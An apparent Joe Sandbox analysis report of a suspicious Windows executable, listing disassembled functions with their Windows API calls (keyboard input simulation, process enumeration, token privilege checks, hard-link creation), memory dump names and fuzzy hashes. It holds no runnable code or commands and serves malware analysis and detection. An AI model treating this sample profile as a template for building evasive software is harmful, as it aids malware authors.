Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00235783
GetLastError.KERNEL32(?,00000000), ref: 002357A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002357CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002357FA

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: a095d468f2915cbea509f6c46dee66497b5ebd21c67a28f00ac637ee3664cd32
Instruction ID: 59662eb461f6d2142e0684c4842549e35f131f8a09a403c02fe7dac5990b537e
Opcode Fuzzy Hash: a095d468f2915cbea509f6c46dee66497b5ebd21c67a28f00ac637ee3664cd32
Instruction Fuzzy Hash: 54413D35610611DFCB11DF55D445A1EBBE2EFA9320F198488E84AAB362CB70FD41DF91

Function 001FD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,001E6D71,00000000,00000000,001E82D9,?,001E82D9,?,00000001,001E6D71,8BE85006,00000001,001E82D9,001E82D9), ref: 001FD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001FD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001FD9AB
__freea.LIBCMT ref: 001FD9B4

Part of subcall function 001F3820: RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 9e63056fd37bd0b50c642aa7075db0f14658aa17b731daeb2a8225c8f3555fcd
Instruction ID: 99eb1ba3932e9e9b3d8b71ae0ee4c6bc6913888f1b3ff61a8feb44c5ecec13cb
Opcode Fuzzy Hash: 9e63056fd37bd0b50c642aa7075db0f14658aa17b731daeb2a8225c8f3555fcd
Instruction Fuzzy Hash: 1931CF72A0020AABDF25DFA5EC45EBE7BA6EB40314F194168FD04D7251EB75CE50CBA0

Function 002552C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00255352
GetWindowLongW.USER32(?,000000F0), ref: 00255375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00255382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002553A8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 8fde0e5877c187b2fa1a864f1dda5ffa1eaf66be2ec9ca4da5c32bad83fcef98
Instruction ID: b83b45f2439472b1169aec4d4ca3783da2d2b5e1b22ed0f08fba2efbee957269
Opcode Fuzzy Hash: 8fde0e5877c187b2fa1a864f1dda5ffa1eaf66be2ec9ca4da5c32bad83fcef98
Instruction Fuzzy Hash: 64310830A75A29FFEB349F14CC25FE83765AB04392F544082FE08561E0C3F09DA89749

Function 0022AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0022ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0022AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0022AC74
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0022ACC6

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 28f2568d4980979c7acce965e3b519ad8685d02278bf5fe2525398d4f5aec679
Instruction ID: 1de9e23eda1d4e0e6fd7138bc327178e6810092425584311ab85927fe412dd8d
Opcode Fuzzy Hash: 28f2568d4980979c7acce965e3b519ad8685d02278bf5fe2525398d4f5aec679
Instruction Fuzzy Hash: E6311630A20329BFFF358FA4EC087FA7BA9AB89310F14421BE481525E1D37489A58752

Function 00257674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0025769A
GetWindowRect.USER32(?,?), ref: 00257710
PtInRect.USER32(?,?,00258B89), ref: 00257720
MessageBeep.USER32(00000000), ref: 0025778C

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: fcd5355dd02145c027a3dc7397a5adf46034b572d014aca3c9c3523eef90bb16
Instruction ID: 2f5df17c4552d20b5b958ecebbe9cd7ea4cf1586f61e454274f516099688127a
Opcode Fuzzy Hash: fcd5355dd02145c027a3dc7397a5adf46034b572d014aca3c9c3523eef90bb16
Instruction Fuzzy Hash: D341BB34A59216DFDB02CF59F888EA8B7F4FB4C316F1440A9E8149B260D330A969CF94

Function 002516DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002516EB

Part of subcall function 00223A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00223A57
Part of subcall function 00223A3D: GetCurrentThreadId.KERNEL32 ref: 00223A5E
Part of subcall function 00223A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002225B3), ref: 00223A65

GetCaretPos.USER32(?), ref: 002516FF
ClientToScreen.USER32(00000000,?), ref: 0025174C
GetForegroundWindow.USER32 ref: 00251752

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 7578c45ee0c72dbb0705179189184a6732ab31869c5ffd92899c8fd7e0832032
Instruction ID: d471789f73d18cd0e9274ccb7cd7ef1479402ce6b5eefedcaf90c82207af7b46
Opcode Fuzzy Hash: 7578c45ee0c72dbb0705179189184a6732ab31869c5ffd92899c8fd7e0832032
Instruction Fuzzy Hash: 77315B71D10249AFCB00EFA9C881DAEBBF9EF58304B5080AAE415E7251E731DE45CBA0

Function 0022D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0022D501
Process32FirstW.KERNEL32(00000000,?), ref: 0022D50F
Process32NextW.KERNEL32(00000000,?), ref: 0022D52F
CloseHandle.KERNEL32(00000000), ref: 0022D5DC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 6dfeead2b6adb5b070a2d10ccf21d1391c309c2501e75ee55d28f8270009ff95
Instruction ID: dab2e5e4adda57c5594e063428ef8ff75be2ec207b97f7c93182a7a93d9376ad
Opcode Fuzzy Hash: 6dfeead2b6adb5b070a2d10ccf21d1391c309c2501e75ee55d28f8270009ff95
Instruction Fuzzy Hash: 48319E71008301AFD301EF54E885FAFBBE8EFA9344F50092DF585861A1EBB1D954CBA2

Function 00258FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2

GetCursorPos.USER32(?), ref: 00259001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00217711,?,?,?,?,?), ref: 00259016
GetCursorPos.USER32(?), ref: 0025905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00217711,?,?,?), ref: 00259094

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 6217fa58e9291c0a07cb47511bd8f88ff4f1da007bdfdf2899ac20ab2e67335a
Instruction ID: 75c1a6d81762f4df017a9ff53b98f9681671a3fe628bafff1ebf4a0ed550ddfb
Opcode Fuzzy Hash: 6217fa58e9291c0a07cb47511bd8f88ff4f1da007bdfdf2899ac20ab2e67335a
Instruction Fuzzy Hash: 7621F131210118EFDB258F94DC58EFB3BB9EF89362F100465F905472A1D33199A0EB64

Function 0022D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0025CB68), ref: 0022D2FB
GetLastError.KERNEL32 ref: 0022D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0022D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0025CB68), ref: 0022D376

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 02b36c3d781e258df75e1c17789b9ef1d940160bda93decc64296707d71599c6
Instruction ID: a17ee733c05c583883efd4703cc54ce2c5eb97ed3b6865509c7f1f42b6be8300
Opcode Fuzzy Hash: 02b36c3d781e258df75e1c17789b9ef1d940160bda93decc64296707d71599c6
Instruction Fuzzy Hash: 9021F330518312AF8310DF64E8858AE77E4EF66324F204A5DF899C32A1E730C955CF87

Function 00221571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00221014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0022102A
Part of subcall function 00221014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00221036
Part of subcall function 00221014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00221045
Part of subcall function 00221014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0022104C
Part of subcall function 00221014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00221062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002215BE
_memcmp.LIBVCRUNTIME ref: 002215E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00221617
HeapFree.KERNEL32(00000000), ref: 0022161E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 782b735e3a11b9661d565445775669b3060bdd1ad8d14058d9befa3ed4fb8287
Instruction ID: e07132bf0ff043e360f770bd473f2d6129ed3cb9823b00ebd6a322f393533bb3
Opcode Fuzzy Hash: 782b735e3a11b9661d565445775669b3060bdd1ad8d14058d9befa3ed4fb8287
Instruction Fuzzy Hash: E2218931E10219BFDB00DFA4E948BEEB7B8EF50355F188459E401AB250E730AA24CBA0

Function 00252782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0025280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00252824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00252832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00252840

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: f13efa06d992258f29d2ec0a48618d157190ec4011f44f7f3ec2d13e467c28dc
Instruction ID: 1a0f23042ac983e9b7f4087b982837e7caaf0fbe4fd5359431844ca1fb48c03f
Opcode Fuzzy Hash: f13efa06d992258f29d2ec0a48618d157190ec4011f44f7f3ec2d13e467c28dc
Instruction Fuzzy Hash: 8721F431214211EFD714DB24D849F6AB795EF56325F248158F8268B2D2C771FC4ACBD4

Function 002278F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00228D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0022790A,?,000000FF,?,00228754,00000000,?,0000001C,?,?), ref: 00228D8C
Part of subcall function 00228D7D: lstrcpyW.KERNEL32(00000000,?,?,0022790A,?,000000FF,?,00228754,00000000,?,0000001C,?,?,00000000), ref: 00228DB2
Part of subcall function 00228D7D: lstrcmpiW.KERNEL32(00000000,?,0022790A,?,000000FF,?,00228754,00000000,?,0000001C,?,?), ref: 00228DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00228754,00000000,?,0000001C,?,?,00000000), ref: 00227923
lstrcpyW.KERNEL32(00000000,?,?,00228754,00000000,?,0000001C,?,?,00000000), ref: 00227949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00228754,00000000,?,0000001C,?,?,00000000), ref: 00227984

Strings

cdecl, xrefs: 0022797B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 9f3ffe37012470a44bee9514034dd9c58c983872b3ac704e7e5767d9f15eb3a1
Instruction ID: 6d9edf45df3368f51cfcfe7aabd7c3ebc6a24d71295e8c72e8fb132ce7b5ec55
Opcode Fuzzy Hash: 9f3ffe37012470a44bee9514034dd9c58c983872b3ac704e7e5767d9f15eb3a1
Instruction Fuzzy Hash: B911293A214352BFCB155F78E844D7A77A5FF45350B10802AF906C73A4EB31D961C751

Function 00257CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00257D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00257D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00257D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0023B7AD,00000000), ref: 00257D6B

Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 463ee28fdd63729f85d4b79917d567ce703e6c531bbb9f9b7fd4e7bce75ba6dd
Instruction ID: 77c8b4a3c88f1e446aa0a1ad88a2df1cd7e53e4fe9f311152163ef8f34cad378
Opcode Fuzzy Hash: 463ee28fdd63729f85d4b79917d567ce703e6c531bbb9f9b7fd4e7bce75ba6dd
Instruction Fuzzy Hash: A111DF31265716AFCB109F28EC08ABA3BA5EF45362B214325FC39D72F0E7319964CB44

Function 00255660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002556BB
_wcslen.LIBCMT ref: 002556CD
_wcslen.LIBCMT ref: 002556D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00255816

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: b6ecdc6569b9f2c8b5e3da0a632d52b77e87fe08d600af17219b3afa8bae1533
Instruction ID: 2903510f41a5c3c1fb71ba31c2a1df0c78d95b26413659c4eef8f35fb0c9f1a3
Opcode Fuzzy Hash: b6ecdc6569b9f2c8b5e3da0a632d52b77e87fe08d600af17219b3afa8bae1533
Instruction Fuzzy Hash: AC11063162062596DF209F61DC95AEE777CFF14366B104026FD05D6081E7B0CAA8CBA8

Function 001F1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9845b9f9c2ba31ff6eb08e4b2158d12612af5e3d3508345b140871842afd76d9
Instruction ID: c2ba74790257ab442c9fec077977d303a46df5900232965388d9ab6103d9ecfc
Opcode Fuzzy Hash: 9845b9f9c2ba31ff6eb08e4b2158d12612af5e3d3508345b140871842afd76d9
Instruction Fuzzy Hash: B9017CB2209A5EBEF61126B87CC8F77662DEF513B8B350325F621A21D2DB708C005170

Function 00221A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00221A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00221A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00221A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00221A8A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: edfdbbf1e8ab38d4d903e48da09ba23d3502b61afedef0f3c5234740de2f7cc4
Instruction ID: d6ddec3a3245bb9dba5e15411cf9d7f020d8a58e93a835ce607a78ebbe8c1f25
Opcode Fuzzy Hash: edfdbbf1e8ab38d4d903e48da09ba23d3502b61afedef0f3c5234740de2f7cc4
Instruction Fuzzy Hash: 18112A3A901229FFEB109BA4D985FADBB78EB18750F200091E600B7294D6716E60DB94

Function 0022E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0022E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0022E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0022E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0022E24D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 191f6ca0a96c87ee7487472e522398ff1b51d5dd8c79c6e5e04022def85327d0
Instruction ID: d2a6ff3d19b6a18336d04c037fa9e1b14d3cb272d7103e4e06769ccdee9cb42b
Opcode Fuzzy Hash: 191f6ca0a96c87ee7487472e522398ff1b51d5dd8c79c6e5e04022def85327d0
